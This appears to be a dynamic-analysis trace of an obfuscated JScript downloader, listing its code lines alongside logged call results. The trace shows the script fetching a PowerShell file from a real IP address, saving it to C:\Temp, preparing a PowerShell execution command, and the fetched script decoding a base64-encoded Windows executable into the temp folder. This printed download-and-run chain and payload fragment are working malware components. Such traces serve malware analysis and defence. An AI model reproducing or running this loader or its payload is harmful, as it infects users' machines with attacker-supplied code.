                                                                                                                  • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                                                                  • _0x3d8f() ➔ 124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia
                                                                                                                  • _0x3d8f() ➔ WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc
                                                                                                                  • _0x3d8f() ➔ W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W
                                                                                                                  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                  • _0x3d8f() ➔ CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT
                                                                                                                  31
                                                                                                                  return _0xe32f =
                                                                                                                    32
                                                                                                                    function (_0xe32f90, _0x265890) {
                                                                                                                    • _0xe32f(310,undefined) ➔ "W4iJW43dGGa8W5i7W40iWOVcRq4"
                                                                                                                    • _0xe32f(310,undefined) ➔ "rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia"
                                                                                                                    • _0xe32f(310,undefined) ➔ "124678FeSFCc"
                                                                                                                    • _0xe32f(310,undefined) ➔ "WQ7dVXVcVCkpCLJcM8keW6W"
                                                                                                                    • _0xe32f(310,undefined) ➔ "5836fimqHT"
                                                                                                                    • _0xe32f(289,undefined) ➔ "C:\Temp\dddddd.ps1"
                                                                                                                    • _0xe32f(274,undefined) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                    • _0xe32f(292,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                                                    • _0xe32f(287,undefined) ➔ "CreateFolder"
                                                                                                                    • _0xe32f(282,undefined) ➔ "GET"
                                                                                                                    33
                                                                                                                    _0xe32f90 = _0xe32f90 - 0x111;
                                                                                                                      34
                                                                                                                      var _0xd04222 = _0x3d8f07[_0xe32f90];
                                                                                                                        35
                                                                                                                        return _0xd04222;
                                                                                                                          36
                                                                                                                          }, _0xe32f ( _0x52b743, _0xdbcf57 );
                                                                                                                            37
                                                                                                                            }
                                                                                                                              38
                                                                                                                              function DownloadScript(_0x26adf9, _0xa9f75e) {
                                                                                                                              • DownloadScript("http://196.251.92.64/crypt/popo.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                              39
                                                                                                                              var _0x43684b = _0x165511, _0x5b10a7 = _0x429836, _0x5e2485 = _0x36bb1e;
                                                                                                                                40
                                                                                                                                try
                                                                                                                                  41
                                                                                                                                  {
                                                                                                                                    42
                                                                                                                                    http[_0x5e2485 ( 0x134, 'h*bh' ) ] ( _0x5b10a7 ( 0x11a ), _0x26adf9, ! [] ), http[_0x5e2485 ( 0x11c, '[aOH' ) ] ( );
                                                                                                                                    • _0x5e2485(308,"h*bh") ➔ "Open"
                                                                                                                                    • _0xe32f(282) ➔ "GET"
                                                                                                                                    • Open("GET","http://196.251.92.64/crypt/popo.ps1",false) ➔ undefined
                                                                                                                                    • _0x5e2485(284,"[aOH") ➔ "Send"
                                                                                                                                    • Send() ➔ undefined
                                                                                                                                    43
                                                                                                                                    if ( http[_0x43684b ( 0x119 ) ] === SUCCESS_STATUS )
                                                                                                                                    • _0x43684b(281) ➔ "Status"
                                                                                                                                    44
                                                                                                                                    {
                                                                                                                                      45
                                                                                                                                      var _0x3564e4 = fileSystem[_0x5b10a7 ( 0x111 ) ] ( _0xa9f75e, ! ! [] );
                                                                                                                                      • _0x5b10a7(273) ➔ "CreateTextFile"
                                                                                                                                      • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
                                                                                                                                      46
                                                                                                                                      return _0x3564e4[_0x5e2485 ( 0x117, 'X$G)' ) ] ( http['ResponseText'] ), _0x3564e4['Close'] ( ), ! ! [];
                                                                                                                                      • _0x5e2485(279,"X$G)") ➔ "Write"
                                                                                                                                      • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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") ➔ undefined
                                                                                                                                      • Close() ➔ undefined
                                                                                                                                      47
                                                                                                                                      }
                                                                                                                                        48
                                                                                                                                        else
                                                                                                                                          49
                                                                                                                                          return LogError ( _0x5b10a7 ( 0x114 ) + http[_0x43684b ( 0x119 ) ] ), ! [];
                                                                                                                                            50
                                                                                                                                            }
                                                                                                                                              51
                                                                                                                                              catch ( _0x317ee2 )
                                                                                                                                                52
                                                                                                                                                {
                                                                                                                                                  53
                                                                                                                                                  return LogError ( _0x5e2485 ( 0x120, '[ck$' ) + _0x317ee2['message'] ), ! [];
                                                                                                                                                    54
                                                                                                                                                    }
                                                                                                                                                      55
                                                                                                                                                      }
                                                                                                                                                        56
                                                                                                                                                        function LogError(_0xee0fb4) {
                                                                                                                                                          57
                                                                                                                                                          var _0x5c2acd = _0x36bb1e;
                                                                                                                                                            58
                                                                                                                                                            WScript[_0x5c2acd ( 0x131, 'Ws2$' ) ] ( _0xee0fb4 );
                                                                                                                                                              59
                                                                                                                                                              }
                                                                                                                                                                60
                                                                                                                                                                function _0x2aa5(_0x52b743, _0xdbcf57) {
                                                                                                                                                                • _0x2aa5(277) ➔ undefined
                                                                                                                                                                • _0x2aa5(277) ➔ "9716744ntollE"
                                                                                                                                                                • _0x2aa5(291) ➔ undefined
                                                                                                                                                                • _0x2aa5(277) ➔ "\xa2\xbfh\xef\x1c\xad"\xbb\xfcJ\xa8Q\xb1\x8a\xd4\xaa$o}H\xffn\xcc{\xc6X"
                                                                                                                                                                • _0x2aa5(277) ➔ "\xd1\x1dw\xc7"
                                                                                                                                                                • _0x2aa5(291) ➔ "\xa1\xedZ\xf7"
                                                                                                                                                                • _0x2aa5(306) ➔ undefined
                                                                                                                                                                • _0x2aa5(277) ➔ "5141585tSDBkb"
                                                                                                                                                                • _0x2aa5(291) ➔ "12642224tnuDGo"
                                                                                                                                                                • _0x2aa5(306) ➔ "9716744ntollE"
                                                                                                                                                                61
                                                                                                                                                                var _0x3d8f07 = _0x3d8f ( );
                                                                                                                                                                • _0x3d8f() ➔ message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4
                                                                                                                                                                • _0x3d8f() ➔ 124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99smo/BSomE8ogwa,W5eDD8oh,W4uIW4NdJfvKWO8CW7yO,5836fimqHT,CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download failed with status: ,nte0mtu4nxrtrejRyG,jaK5Emo3iSkUAW,W4VdKZ5ZrG,WQ0zW5eBW5/cR8oIyHpcSa,u3rHDhvZ,GET,9MuWyMs,WQhdRvRdTW,Run,nZDxAenPu0e,CreateFolder,WP/dSJ3dSmowE0BcJSkcyCkCtYRcUKNdTSoIWOtcV8kfurpdO8kWFW0,C:\Temp\dddddd.ps1,mZCXmtKWy1jLB2Xv,mti2ndiYmJr0BNver28,MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia
